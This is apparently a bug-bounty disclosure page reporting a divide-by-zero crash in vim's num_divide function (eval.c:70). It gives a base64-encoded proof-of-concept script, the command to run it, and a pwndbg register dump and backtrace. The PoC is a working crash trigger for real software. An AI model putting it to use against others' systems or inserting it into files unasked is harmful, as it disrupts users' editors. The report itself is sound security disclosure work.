Floating point exception in function num_divide at eval in vim/vim
Valid
Reported on
Oct 18th 2022
Floating point exception in function num_divide at eval.c:70
Impact
vim version
git log -1
commit db4c94788ad70118fa1ccc5fbc821757350ac771 (HEAD -> master, tag: v9.0.0769, origin/master, origin/HEAD)
Proof of Concept
# ./src/vim -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
Floating point exception
Content of poc_min (base64 encoded):
Y2FsIHMoMC8wLy0x
GDB output:
pwndbg> r -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
Starting program: /root/vim/src/vim -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
warning: Error disabling address space randomization: Operation not permitted
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGFPE, Arithmetic exception.
0x00005610b5f67cdb in num_divide (n2=-1, n1=<optimized out>, failed=<optimized out>) at eval.c:70
70 result = n1 / n2;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───[ REGISTERS / show-flags off / show-compact-regs off ]──
*RAX 0x8000000000000000
*RBX 0x7ffee0e09ca0 ◂— 0x0
*RCX 0x5610b748d820 (__afl_area_initial) ◂— 0x0
*RDX 0xffffffffffffffff
*RDI 0x5610b6a9f760 (__afl_area_ptr) —▸ 0x5610b748d820 (__afl_area_initial) ◂— 0x0
*RSI 0x2f
R8 0x0
*R9 0xfffdc1c136c ◂— 0x0
*R10 0x7ffee0e095a0 ◂— 0x0
*R11 0xffffffffffffffff
*R12 0x7ffee0e09c60 ◂— 0x5
*R13 0x7ffee0e0aa40 ◂— 0x5
*R14 0x7ffee0e0afd0 ◂— 0x1
*R15 0x8000000000000000
*RBP 0x7ffee0e09d90 —▸ 0x7ffee0e0a030 —▸ 0x7ffee0e0a170 —▸ 0x7ffee0e0a2f0 —▸ 0x7ffee0e0a550 ◂— ...
*RSP 0x7ffee0e09c20 ◂— 0x41b58ab3
*RIP 0x5610b5f67cdb (eval7+2587) ◂— idiv r11
────[ DISASM / x86-64 / set emulate on ]───
► 0x5610b5f67cdb <eval7+2587> idiv r11
↓
0x5610b5f67cdb <eval7+2587> idiv r11
──────[ SOURCE (CODE) ]───────
In file: /root/vim/src/eval.c
65 result = -VARNUM_MAX;
66 else
67 result = VARNUM_MAX;
68 }
69 else
► 70 result = n1 / n2;
71
72 return result;
73 }
74
75 /*
─────[ STACK ]──────
00:0000│ rsp 0x7ffee0e09c20 ◂— 0x41b58ab3
01:0008│ 0x7ffee0e09c28 —▸ 0x5610b6857698 ◂— '4 32 4 14 getnext.i:2442 48 4 12 getnext:3539 64 16 9 var2:3540 96 4 10 error:3545'
02:0010│ 0x7ffee0e09c30 —▸ 0x5610b5f672c0 (eval7) ◂— push rbp
03:0018│ 0x7ffee0e09c38 ◂— 0x0
... ↓ 4 skipped
───────[ BACKTRACE ]────
► f 0 0x5610b5f67cdb eval7+2587
f 1 0x5610b5f67cdb eval7+2587
f 2 0x5610b5f65b0b eval6+299
f 3 0x5610b5f650b1 eval5+209
f 4 0x5610b5f644a5 eval4+325
f 5 0x5610b5f63513 eval3+275
f 6 0x5610b5f3e02b eval1+395
f 7 0x5610b5f3e02b eval1+395
pwndbg> bt
#0 0x00005610b5f67cdb in num_divide (n2=-1, n1=<optimized out>, failed=<optimized out>) at eval.c:70
#1 eval7 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0, want_string=0) at eval.c:3666
#2 0x00005610b5f65b0b in eval6 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:3309
#3 0x00005610b5f650b1 in eval5 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0xffffffffffffffff) at eval.c:3198
#4 0x00005610b5f644a5 in eval4 (arg=<optimized out>, rettv=<optimized out>, evalarg=<optimized out>) at eval.c:3049
#5 0x00005610b5f63513 in eval3 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:2910
#6 0x00005610b5f3e02b in eval2 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:2784
#7 eval1 (arg=0x7ffee0e0a920, rettv=<optimized out>, evalarg=0x7ffee0e0afd0) at eval.c:2630
#8 0x00005610b6628019 in get_func_arguments (arg=0x7ffee0e0aa20, evalarg=<optimized out>, partial_argc=<optimized out>, argvars=<optimized out>, argcount=<optimized out>) at userfunc.c:1757
#9 0x00005610b66272cf in get_func_tv (name=<optimized out>, len=<optimized out>, rettv=<optimized out>, arg=<optimized out>, evalarg=<optimized out>, funcexe=<optimized out>) at userfunc.c:1820
#10 0x00005610b664b469 in ex_call_inner (eap=0x7ffee0e0b2e0, name=0x5610b6a9f760 <__afl_area_ptr> " \330H\267\020V", arg=0x5610b748d820 <__afl_area_initial>, startarg=0x7ffee0e095a0 "", evalarg=0x0, funcexe_init=<optimized out>) at userfunc.c:5647
#11 ex_call (eap=0x7ffee0e0b2e0) at userfunc.c:5971
#12 0x00005610b5ff046a in do_one_cmd (cmdlinep=0x7ffee0e0b510, flags=7, cstack=0x7ffee0e0b530, fgetline=0x5610b6445a50 <getsourceline>, cookie=0x7ffee0e0c120) at ex_docmd.c:2578
#13 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:990
#14 0x00005610b6443024 in do_source_ext (fname=<optimized out>, check_other=<optimized out>, is_vimrc=<optimized out>, ret_sid=<optimized out>, eap=<optimized out>, clearvars=<optimized out>) at scriptfile.c:1667
#15 0x00005610b6440c95 in do_source (check_other=0, is_vimrc=0, ret_sid=0x0, fname=<optimized out>) at scriptfile.c:1811
#16 cmd_source (fname=<optimized out>, eap=0x7ffee0e0c460) at scriptfile.c:1163
#17 0x00005610b5ff046a in do_one_cmd (cmdlinep=0x7ffee0e0c690, flags=11, cstack=0x7ffee0e0c6b0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2578
#18 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:990
#19 0x00005610b6809f1a in exe_commands (parmp=<optimized out>) at main.c:3135
#20 vim_main2 () at main.c:781
#21 0x00005610b680720c in main (argc=11, argv=0x7ffee0e0f9c8) at main.c:432
#22 0x00007f887ac9cd90 in __libc_start_call_main (main=main@entry=0x5610b6802900 <main>, argc=argc@entry=11, argv=argv@entry=0x7ffee0e0f9c8) at ../sysdeps/nptl/libc_start_call_main.h:58
#23 0x00007f887ac9ce40 in __libc_start_main_impl (main=0x5610b6802900 <main>, argc=11, argv=0x7ffee0e0f9c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffee0e0f9b8) at ../csu/libc-start.c:392
#24 0x00005610b5d2a265 in _start ()
Impact
This vulnerability is capable of crashing software.
Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale
We are processing your report and will contact the
vim
team within 24 hours.
7 months ago
We have contacted a member of the
vim
team and are waiting to hear back
7 months ago
Interesting corner case.
ex7l0it
has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
to join this conversation